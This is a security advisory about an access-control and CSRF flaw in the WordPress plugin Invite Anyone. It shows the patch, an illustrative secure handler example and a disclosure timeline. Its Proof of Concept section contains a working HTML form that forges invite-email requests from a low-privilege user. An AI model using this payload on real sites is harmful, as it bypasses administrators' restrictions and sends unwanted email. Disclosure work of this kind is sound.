Improper Access Control Vulnerability in Invite Anyone
At the beginning of the year we took a couple of actions to improve our inclusion of vulnerabilities where there has not been a report on the vulnerability released by the discoverer so that we could expand the number of vulnerabilities we include in our dataset. First, we expanded our monitoring of changes made to plugins to spot more of those situations. Second, we started releasing posts with the details of those vulnerabilities, which allows us to provide more information on the vulnerabilities to our customers than we otherwise could. That has also led to us spotting additional vulnerabilities in those plugins, just as we have when reviewing reports for other vulnerabilities.
While putting together a post on a vulnerability that had existed in the plugin Invite Anyone we noticed another related vulnerability. The original vulnerability involved a lack of enforcement of an admin-set restriction on users setting the subject and message of invite emails sent through the plugin. While looking into the details of that vulnerability we noticed that the plugin also didn't enforce the access control restrictions that can be set for sending invite emails through the plugin. While the relevant page for sending emails was not shown to users who should not be able to send them, such a user could still send a request that caused those emails to be sent. The sending of emails also lacked protection against cross-site request forgery (CSRF), which would otherwise have stopped those requests as well. We notified the developer of those issues and they quickly got back to us; they have now released version 1.3.16, which resolves the vulnerabilities.
The vulnerabilities were fixed by adding the following code to the function invite_anyone_catch_send() in the file /by-email/by-email.php:
```php
if ( ! invite_anyone_access_test() ) {
	return;
}

if ( ! isset( $_POST['ia-send-by-email-nonce'] ) || ! wp_verify_nonce( wp_unslash( $_POST['ia-send-by-email-nonce'] ), 'invite_anyone_send_by_email' ) ) {
	return;
}
```
The function invite_anyone_access_test() checks whether the current user is permitted to send invite emails, and the second part checks whether a valid nonce was included with the request to send the invite emails (the nonce is added to the relevant form elsewhere in the code) to prevent CSRF. If either of those checks fails, the function exits and the invite emails are not sent.
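The general pattern the fix follows, written out as an added example rather than code from the Invite Anyone plugin: the access decision lives in one function, the form embeds a nonce bound to a named action, and the request handler repeats the access check and verifies the nonce before doing any work. Every name prefixed `example_` (including the `example_invite_min_role` option) is an assumption for illustration; the WordPress functions called are core APIs.

```php
<?php
// Added example, not code from the Invite Anyone plugin. All names prefixed
// "example_" are assumptions for illustration; the WordPress functions are
// real core APIs.

// 1. One place decides who may send. The minimum role is read from an
//    assumed option; it is mapped to a capability so the check works with
//    custom roles that carry the same capability.
function example_invite_access_test() {
	if ( ! is_user_logged_in() ) {
		return false;
	}
	$min_role  = get_option( 'example_invite_min_role', 'administrator' );
	$role_caps = array(
		'administrator' => 'manage_options',
		'editor'        => 'edit_others_posts',
		'author'        => 'publish_posts',
		'contributor'   => 'edit_posts',
		'subscriber'    => 'read',
	);
	$cap = isset( $role_caps[ $min_role ] ) ? $role_caps[ $min_role ] : 'manage_options';
	return current_user_can( $cap );
}

// 2. The form is only rendered for permitted users and carries a nonce
//    tied to the action name 'example_invite_send'.
function example_invite_form() {
	if ( ! example_invite_access_test() ) {
		return; // hiding the form is necessary but not sufficient, see step 3
	}
	echo '<form method="post">';
	wp_nonce_field( 'example_invite_send', 'example-invite-nonce' );
	echo '<input type="email" name="example_invite_email">';
	echo '<input type="submit" name="example-invite-submit" value="Send">';
	echo '</form>';
}

// 3. The handler re-checks access and verifies the nonce before acting, so a
//    crafted POST from an unauthorised user or a third-party page is dropped.
function example_invite_catch_send() {
	if ( ! isset( $_POST['example-invite-submit'] ) ) {
		return;
	}
	if ( ! example_invite_access_test() ) {
		return; // access control, independent of whether the form was shown
	}
	if ( ! isset( $_POST['example-invite-nonce'] )
		|| ! wp_verify_nonce( wp_unslash( $_POST['example-invite-nonce'] ), 'example_invite_send' ) ) {
		return; // CSRF protection: nonce missing, expired, or for another action
	}
	$email = isset( $_POST['example_invite_email'] ) ? sanitize_email( wp_unslash( $_POST['example_invite_email'] ) ) : '';
	if ( ! is_email( $email ) ) {
		return;
	}
	wp_mail( $email, 'You have been invited', 'Invitation text goes here.' );
}
add_action( 'init', 'example_invite_catch_send' );
```

The order of the checks in the handler matters only for efficiency; what matters for security is that both run on every request, since the nonce alone does not establish that the logged-in user is allowed to send, and the capability check alone does not establish that the user intended the request.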
Proof of Concept
On the page /wp-admin/admin.php?page=invite-anyone&subpage=access-control set it so that only Administrator-level users are allowed to send invite emails. Then when logged in as a lower level user submit the proof of concept below and the invite email will be sent.
Make sure to replace "[path to WordPress]" with the location of WordPress, "[username]" with the username of the user making the request, and "[email address]" with the email address to send the email invite to.
```html
<html>
<body>
<form action="http://[path to WordPress]/members/[username]/invite-anyone/sent-invites/send/" method="POST">
<input type="hidden" name="invite_anyone_email_addresses" value="[email address]">
<input type="hidden" name="invite_anyone_custom_subject" value="An invitation to join the test community.">
<input type="hidden" name="invite_anyone_custom_message" value="You have been invited by test to join the test community. Visit test's profile at http://localhost/members/test/.">
<input type="hidden" name="invite-anyone-submit" value="Send Invites ">
<input type="submit" value="Submit" />
</form>
</body>
</html>
```
Timeline
- March 20, 2017 – Developer notified.
- March 20, 2017 – Developer responds.
- March 22, 2017 – Version 1.3.16 released, which fixes the vulnerabilities.